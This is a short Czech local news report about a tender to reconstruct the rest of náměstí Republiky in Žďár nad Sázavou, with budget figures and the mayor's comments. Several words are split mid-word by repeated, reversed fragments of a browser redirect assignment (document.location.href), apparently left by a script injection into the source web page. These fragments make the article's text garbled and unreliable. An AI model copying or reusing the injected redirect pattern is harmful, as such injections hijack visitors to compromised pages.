Rainbow page separator

Vyhlásili výběrové řízení na rekonstrukci zbytku náměstí

Čtvrtek, 31. března 2016

Náměstí Republiky Žďár nad Sázavou

Žďár nad Sázavou / Výběrové řízení na zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovitele rekonstrukce spodní části náměstí Republiky schválili žďárští radní. Náměstí v pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru před ČSOB směrem k Havlíčkovu náměstí bude zrekonstruováno v průběhu letních měsíců.
Vybraná stavební firma provede rekonstrukci zbývající části náměstí tak, aby ladila s již opraveným středem. V le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním rozpočtu je na dokončení oprav vyčleněno dvanáct milionů korun. „Budeme se držet podoby, kterou dostalo náměstí při rekonstrukci v minulých letech, aby došlo k optickému propojení náměstí Republiky a Havlíčkova náměstí,“ vyjádřil se žďárský starosta Zdeněk Navrátil.
Na zbytku náměstí bude položena nová dlažba, přibude tam zeleň, nový mobiliář či mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pro konání trhů. Součástí rekonstrukce bude i instalování sochy muže se síťovkou, která má připomínat žďárskou tradici síťování a výroby tašek-síťovek.